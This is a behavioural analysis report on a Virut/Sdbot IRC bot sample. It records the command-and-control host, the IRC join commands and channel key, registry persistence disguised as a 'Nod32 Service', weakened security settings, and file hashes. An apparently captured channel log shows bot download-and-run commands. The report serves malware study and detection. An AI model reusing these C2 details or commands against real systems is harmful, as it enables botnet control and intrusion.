75.73.242.77

Remote Host Port Number
75.73.242.77 6667

NICK USA|00|XP|SP2|4431695
USER ftjjnps 0 0 :USA|00|XP|SP2|4431695
USERHOST USA|00|XP|SP2|4431695
MODE USA|00|XP|SP2|4431695 -x+i
JOIN ###chaosbot### chaosisfullalulz
PRIVMSG ###chaosbot### :[NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: 192.168.194.128. [Hostname]: 174.133.89.72.
JOIN ###dd0s### (null)
PRIVMSG ###chaosbot### :
(patcher.p
fixed, version 1.
PONG :CE21787E

Outbound traffic was produced on port 6667:
00000000 | 5041 5254 2023 2323 6368 616F 7362 6F74 | PART ###chaosbot
00000010 | 2323 230D 0A | ###..

* The following ports were open in the system:

Port                                Protocol  Process
69                                  UDP       mstwain21.exe (%System%\mstwain21.exe)
1055                                TCP       mstwain21.exe (%System%\mstwain21.exe)
1432-1529 (every port in the range) TCP       mstwain21.exe (%System%\mstwain21.exe)

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
  o HKEY_CURRENT_USER\Software\Microsoft\OLE

* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
    + EnableRemoteConnect = “N”
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Nod32 Service = “mstwain21.exe”

    so that mstwain21.exe runs every time Windows starts
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
    + Nod32 Service = “mstwain21.exe”

    so that mstwain21.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    + MaxConnectionsPer1_0Server = 0x00000050
    + ForwardBufferMemory = 0x00019DF7
    + MaxConnectionsPerServer = 0x00000050
  o [HKEY_CURRENT_USER\Software\Microsoft\OLE]
    + Nod32 Service = “mstwain21.exe”

* The following Registry Values were modified:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
    + EnableDCOM =
  o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]
    + restrictanonymous =
  o [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
    + restrictanonymous =

Memory Modifications

* There was a new process created in the system:

Process Name   Process Filename         Main Module Size
mstwain21.exe  %System%\mstwain21.exe   1 232 896 bytes

File System Modifications

* The following file was created in the system:

# 1
  Filename(s): %System%\mstwain21.exe
               [file and pathname of the sample #1]
  File Size:   1 204 224 bytes
  File Hash:   MD5: 0x4A08C311A84635CF5A8C1CBC625ABDCA
               SHA-1: 0x3D80A6BA5C383F1AEE7571B7787DF14C796A4F5B
  Alias:       Win32.Virut.Gen.4 [PCTools]
               W32.Randex.gen [Symantec]
               Virus.Win32.Virut.av [Kaspersky Lab]
               W32/Sdbot.worm.gen.g [McAfee]
               PE_VIRUT.AV [Trend Micro]
               W32/Virut-W [Sophos]
               Virus:Win32/Virut.AC [Microsoft]
               Win32/Virut.B [AhnLab]

Now talking in ###chaosbot###
Topic On: [ ###chaosbot### ] [ .root.mass -s ]
Topic By: [ ChanServ ]
Query with Bender
Waiting for acknowledgement…
(Bender) USA|00|XP|SP2|4431695 .com.ni
Modes On: [###chaosbot### ] [ +sntuk chaosisfullalulz ]
(user!notice) from Bende .com.kpn Windows23.exe -s
(user!notice)- from Bender .com.kpn svchost32.exe -s
.r0x kaosb0t -s

Invisible Users: 158
Operators: 9 operator(s) online
Channels: 6 channels formed
Clients: I have 157 clients and 1 servers
Local users: Current Local Users: 157 Max: 479
Global users: Current Global Users: 165 Max: 382